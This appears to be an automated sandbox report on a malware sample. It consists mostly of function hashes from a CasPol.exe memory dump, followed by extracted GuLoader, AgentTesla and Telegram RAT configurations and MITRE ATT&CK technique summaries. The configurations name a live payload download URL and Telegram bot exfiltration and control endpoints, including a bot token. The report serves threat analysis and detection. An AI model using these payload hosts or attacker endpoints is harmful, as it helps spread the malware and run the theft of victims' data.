Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bcc5ae6a5b4689b70fee520d35bdd3669e00a61d872eafa3190230ca373241e
Instruction ID: 296ac78cbf79a93a17b75bd5e3acdebab01050dbe7a57bb5a31503dfedd75925
Opcode Fuzzy Hash: 2bcc5ae6a5b4689b70fee520d35bdd3669e00a61d872eafa3190230ca373241e
Instruction Fuzzy Hash: E001D435B082198FCB40EBB9D8902AEBBE5EB89254B414539D909E7700EB319D0987D1

Uniqueness

Uniqueness Score: -1.00%

Function 1FCEFB98 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bdc283369533748bdec7c2a91a92c07ebdf57c66f36a9ad6e6dfe3221d6310b
Instruction ID: 0b35ff4a4b00d69bda1038c36e828db56eec23ac29de251252b25f37477bb0f5
Opcode Fuzzy Hash: 6bdc283369533748bdec7c2a91a92c07ebdf57c66f36a9ad6e6dfe3221d6310b
Instruction Fuzzy Hash: 66112E74D08219EFCB00EFA8D89059DFBB1FB45304B808969D815E7290EB716F09CF81

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF93D Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1981fdcc16b2f0991d2e7b0e69ab5b7fd787ca451db0781e2821ed4a1699add5
Instruction ID: 25d33c5b78fe92e82c558a6821f673c1490ca52d06388d853e6cc84b46c9e145
Opcode Fuzzy Hash: 1981fdcc16b2f0991d2e7b0e69ab5b7fd787ca451db0781e2821ed4a1699add5
Instruction Fuzzy Hash: 1311F578A44328CFCB21DBA4C888A8EB375FF89305F5041E9D449A2754DB319E81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A2198 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ff37074e9674bbed7b10ab3c72c5db0992652e0ec571b0992e42f83c3af55e
Instruction ID: 3d6e7e629e6ffcdb1c8aa409d11d3b341b2ee9c7f5468ce3801571dbec40583e
Opcode Fuzzy Hash: 82ff37074e9674bbed7b10ab3c72c5db0992652e0ec571b0992e42f83c3af55e
Instruction Fuzzy Hash: 3BF090357401625BD3208A2EECC4E6776A9EBC6764F615536FA19CB702D561DC00C2A2

Uniqueness

Uniqueness Score: -1.00%

Function 1FCE6AB8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28d52771e14da15d81743f69847f9f99b1a8ed4fb52bc67d6a9bff22daa17044
Instruction ID: 48db2dde637e6b3467d6c03f1403d1975f5cef464719dbd7d4b01b64bcbb7358
Opcode Fuzzy Hash: 28d52771e14da15d81743f69847f9f99b1a8ed4fb52bc67d6a9bff22daa17044
Instruction Fuzzy Hash: A1F02272F3C2D48FC7068760845025DBFB2DB86610F1681A6C8549F287DB31AD49A7D2

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF985 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89192e4bdb337cdf447117cae574b7d0b0a88ea2e65aaba4385fe548fc6f0edb
Instruction ID: 34bd17700798270327b61649b3d034760748747681aabcd653532770edc7f824
Opcode Fuzzy Hash: 89192e4bdb337cdf447117cae574b7d0b0a88ea2e65aaba4385fe548fc6f0edb
Instruction Fuzzy Hash: 22012578A41228CFCB25DBA4D888ACDB371FF86304F1081EAD509A3350DB319E81CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A5BC1 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe248c0ad6e46770360750eb57be34dd4a7affb0acbc68c1f5efd4dcc2e24d8
Instruction ID: 2a1385ca53b0da9032414da3d654adae42891b3c67c4600ba2cf07cf4f70cbb5
Opcode Fuzzy Hash: abe248c0ad6e46770360750eb57be34dd4a7affb0acbc68c1f5efd4dcc2e24d8
Instruction Fuzzy Hash: D4F0907104C7C15BCB039770A8501C97FA06F4362436D09DFD4648F567DB27A996D792

Uniqueness

Uniqueness Score: -1.00%

Function 1D2ADAE0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95e97fc9ed03c08e0de3e6b74988b0c1769984c5fa5ca56d300877b3f871511a
Instruction ID: d6596da2f7cf9e9a09a189689c28b89efc5c4bc5426460d6ac17b0546a12e8e1
Opcode Fuzzy Hash: 95e97fc9ed03c08e0de3e6b74988b0c1769984c5fa5ca56d300877b3f871511a
Instruction Fuzzy Hash: E2F0E566A4C2934BE311527C88803193A60DB66361F9000E3E05ACBA92F669C846C217

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A5C78 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b422b9dae612c685e0d8ed14ff2734975180b8c0d4d47e990b6256003f4e396
Instruction ID: 14e08786feb181f9ddde99ab3197d55c9fdc9d922cf3a2e42b5f62d99f590cc9
Opcode Fuzzy Hash: 4b422b9dae612c685e0d8ed14ff2734975180b8c0d4d47e990b6256003f4e396
Instruction Fuzzy Hash: E8F06D30908349EFCB04EFB4E88518CBBB1AF46304B5144EAC809DB265EB712F49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1D2ADDF6 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f349b445e37715e235e831ef0c9b6eaabc2502c29336f2ce1ae60dcaa900ac6
Instruction ID: 05e82af67652b9dc0f69faa8412657ad4d4642bc9826cf08009609241c646b36
Opcode Fuzzy Hash: 6f349b445e37715e235e831ef0c9b6eaabc2502c29336f2ce1ae60dcaa900ac6
Instruction Fuzzy Hash: 51F01C35B412248BCF159BB084583AD77B2EB8472AF518469E916DB380DF36CC16CB45

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A28B4 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0514ab9149264213e297633599c8a8dc625b27ede0e6bf08ddf0b31e9c10844
Instruction ID: 28f36702082ddabe1c37ad8a37ba272459dcc5db735619c1e24d411cdc109aea
Opcode Fuzzy Hash: b0514ab9149264213e297633599c8a8dc625b27ede0e6bf08ddf0b31e9c10844
Instruction Fuzzy Hash: FCF0277351C1704FD31197B8AC9926C3B54EEA721434584E7E041CF955DA59C60AC322

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AF9CD Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49b423b1631d25740c6bbd43f6104a6dd76af7e25b1b85ce1d3925cc62cf62ea
Instruction ID: a8a6d5169035d1932d698efdec397e79e8c7c4a2194f80ca6cd28a2d3b9c8874
Opcode Fuzzy Hash: 49b423b1631d25740c6bbd43f6104a6dd76af7e25b1b85ce1d3925cc62cf62ea
Instruction Fuzzy Hash: 64F01478A40228CFCB65DBA4C888ACDB370FF85314F2081E6D519A3250DB319E81CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A0C40 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9569de7a775cd1cdbe4c00b7f577f6d237a8bff52c059aa917a2c550fc772367
Instruction ID: 65b5690f6eba4fec4925a19afce585fd798effc58a64c1c5e35da3c0e721be96
Opcode Fuzzy Hash: 9569de7a775cd1cdbe4c00b7f577f6d237a8bff52c059aa917a2c550fc772367
Instruction Fuzzy Hash: 6AE09B7114E7544FC7145BB4ABC91447B69DB457213021492D050CB495DA755929C6B2

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A4BAF Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7e4d1b07a1d123be90ba1c1ece99121c29e91daf9cc000afe8e978f9ac765f7
Instruction ID: 582ee5a9c3bc90ac80e0f8831768d10a9a492bd8555272a37961840eab4e91cc
Opcode Fuzzy Hash: d7e4d1b07a1d123be90ba1c1ece99121c29e91daf9cc000afe8e978f9ac765f7
Instruction Fuzzy Hash: 79F0E935C182DA8AC7025B70D8852DDBF60EF51322F4446CFC99A42082EF31456ACB81

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A5C88 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2780d2c43aa1bcedc929302fd68c153b112d9d19505b31c15d2aa90408e3a795
Instruction ID: 37ac53b9dc631d1a874d3721ea4b1d5a1c54f6160e86d6a3606279b27caeb336
Opcode Fuzzy Hash: 2780d2c43aa1bcedc929302fd68c153b112d9d19505b31c15d2aa90408e3a795
Instruction Fuzzy Hash: D1F08C30A0834DEFCB04EFB4EC8558CBBB1AB45204B9044B9C809EB220EB702F49CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1FCEBEE0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e2b3df320ed20f442ecf35d7635a5d5874159c0baf22d4c30a4985af6f81f61
Instruction ID: 341bc86165d4fd45b3be359e01796e4e283856e0ebdd739e5a35b2d8472f6832
Opcode Fuzzy Hash: 8e2b3df320ed20f442ecf35d7635a5d5874159c0baf22d4c30a4985af6f81f61
Instruction Fuzzy Hash: F9E01275E001299F87509FBD98445FF7BF9EA8D221B050176E509D3201E63049158BE1

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A5BE1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a2b494c7cebf55d70bc20c3778add799cf5f8d186c836cb61cb185bc3b53ec8
Instruction ID: 37a8c274fb4577aed6cd096a4a08574404503aca33018d16f768e1d1853a8fbf
Opcode Fuzzy Hash: 0a2b494c7cebf55d70bc20c3778add799cf5f8d186c836cb61cb185bc3b53ec8
Instruction Fuzzy Hash: E4E0D87114C7805BC7029B70A85018E3FA0AF4372435A4DAED4698F657DB73E847C7D2

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A540E Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81fb591876806bf57951c6a322f2e4ebaf66e356b7163bf5a387f5daf4480d4
Instruction ID: ee7586b01875c9cffec643fe322b4aaea676aec3836fa637403bcd29a9ee9966
Opcode Fuzzy Hash: e81fb591876806bf57951c6a322f2e4ebaf66e356b7163bf5a387f5daf4480d4
Instruction Fuzzy Hash: 27E06D70D8860ADBEB15DF20D9987EF7BB1FB003A6F604414D022955A1CB751D85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1D2AFA15 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 195f15bb8da76bb217ec8fe45aa03745e3d7ce3cda5113ceb9e43c9f2de4d3a1
Instruction ID: 0774c8854d629761bb4cbfb529ddca33b7a94cbf3380feadfde24e4946250b68
Opcode Fuzzy Hash: 195f15bb8da76bb217ec8fe45aa03745e3d7ce3cda5113ceb9e43c9f2de4d3a1
Instruction Fuzzy Hash: 03F039B9E05228CFCB24DBA8D884ACDB370FF85304F1040E6D218A3200DB306E80CF62

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A5470 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79b1f4815f0c69f212d84ea175070c7afa7ad529d38f1c4f79393511ba786f02
Instruction ID: 80a2d8bdc47dd22fca45e428bdb6475c29510801d107f1d483350b335f26094c
Opcode Fuzzy Hash: 79b1f4815f0c69f212d84ea175070c7afa7ad529d38f1c4f79393511ba786f02
Instruction Fuzzy Hash: 3CE0C23AD00218CBCB01DF80D4896DCB7B1FB88336F508056D91673291C7322D11CF10

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A56A1 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf988446f6fcb4a3dcba313889d2eadcd19cd66db739aaf3c514ad7ec273903
Instruction ID: 8354491b5a76bd7947483d2c457c5114caa43a1963d039f0311473419f155ae3
Opcode Fuzzy Hash: 0bf988446f6fcb4a3dcba313889d2eadcd19cd66db739aaf3c514ad7ec273903
Instruction Fuzzy Hash: 43E065360087448FD301DF22C48674A3BA5BB40328F828099C4080B2B3D7B6F45A8FC2

Uniqueness

Uniqueness Score: -1.00%

Function 1FCE93D1 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9117671549.000000001FCE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1fce0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c13f0bff3472d14f87cd2830adb846657194202f22b1f8d782f2e443106bf6
Instruction ID: 8364ee20966a02f8c6e2bbab808d662eff1e503c3cebb29c2a086e78030ef510
Opcode Fuzzy Hash: 98c13f0bff3472d14f87cd2830adb846657194202f22b1f8d782f2e443106bf6
Instruction Fuzzy Hash: CBD0EC39B042248BCB54DBB5D9981DDB7B2FBC8216F10806AD01A92102CF3819168F00

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A5BF0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad4d50aaac6edcf00673e07e39aa9eb69fbd6951e7fc52e102e951bd1f6675c7
Instruction ID: f63670b8518c3f3153e3114d6f66c804dd454438a9103df9fac83e2584e5f3d3
Opcode Fuzzy Hash: ad4d50aaac6edcf00673e07e39aa9eb69fbd6951e7fc52e102e951bd1f6675c7
Instruction Fuzzy Hash: ECD0127124830487C700EBA5D84044D7765AB816243958D78D5299F615DF73E8078BD6

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A4BC0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2d9ce1e58a1f4e0b051b763d41df2a7f4ee9c83e239455c5f15aa5ce00d040
Instruction ID: ff4d9d99227e45491d13de423a694e6ace123774fc563525c4831cfb5fe855b3
Opcode Fuzzy Hash: ee2d9ce1e58a1f4e0b051b763d41df2a7f4ee9c83e239455c5f15aa5ce00d040
Instruction Fuzzy Hash: 7AD05E30C1411D8BCB08EFA4D89A4BDBB38FB10322F8041AAED0B52595EF31196ACFC1

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A56B0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d95267001ac49e5102c783267d758369c412df7acf040d204fb99d0e8bd9ea
Instruction ID: 7792f21324eaebcad289c69fc8a2399ac988430547b7382efc8e4a7ff0da1b95
Opcode Fuzzy Hash: 68d95267001ac49e5102c783267d758369c412df7acf040d204fb99d0e8bd9ea
Instruction Fuzzy Hash: 52D05E341583148BD300EB66C488B4A3BA5BB44328F90C428C81C0B2A2CBB7F45A9FC3

Uniqueness

Uniqueness Score: -1.00%

Function 1D2ACBD3 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e429a4cb990801b5a0c3d70ff591ec3e0a0d72834c78f3c2f0e92fe3ed5f10aa
Instruction ID: c7d9f7ce1cc3fed905a9b1ea1ea85f2cfd880b28ed78cc61eb22773a10aa98c4
Opcode Fuzzy Hash: e429a4cb990801b5a0c3d70ff591ec3e0a0d72834c78f3c2f0e92fe3ed5f10aa
Instruction Fuzzy Hash: 02D0C97AE481398BCF00EFF4E8C80CCB770EF88226B000532D216E3110EB7559298B61

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A0C50 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbe85845470a5ac862c0ec1eb5fb67325d46299fb54932f3eda4b662416d86e1
Instruction ID: 241fe604d39f1977b0152dca419733cbf26650d681f3f028ccfc91102f8345f0
Opcode Fuzzy Hash: bbe85845470a5ac862c0ec1eb5fb67325d46299fb54932f3eda4b662416d86e1
Instruction Fuzzy Hash: 5CC080B01082148BC3103B74DC4D1687B5CFFCC3327000472E00781550CF921839C531

Uniqueness

Uniqueness Score: -1.00%

Function 1D2A5212 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.9106792973.000000001D2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1d2a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c239f82768d3bd36dee020dfe298062bfac82a0c59bf16b8951fabb6cc39c114
Instruction ID: 44125e13872b7aca8a34386dfbfa28a53fb932ad57c198452ac0842f41cc847f
Opcode Fuzzy Hash: c239f82768d3bd36dee020dfe298062bfac82a0c59bf16b8951fabb6cc39c114
Instruction Fuzzy Hash: 8AB0123155400D87C7088AC0D48503D7730E781321B400284E90911840CB321C60C782

Uniqueness

Uniqueness Score: -1.00%

Source: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://msdvc.com/oluwa_RcQBQnZSyJ230.bin"}
Source: conhost.exe.8960.7.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "765471673", "Chat URL": "https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendDocument"}
Source: CasPol.exe.8436.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2052954011:AAFeCX87Ol6W5cv9u3MpOVAjUZO3XwJALyU/sendMessage"}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_20707A18 CryptUnprotectData,		6_2_20707A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 6_2_20708018 CryptUnprotectData,		6_2_20708018

Source: file.exe	Virustotal: Detection: 26%			Perma Link
Source: file.exe	ReversingLabs: Detection: 21%

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
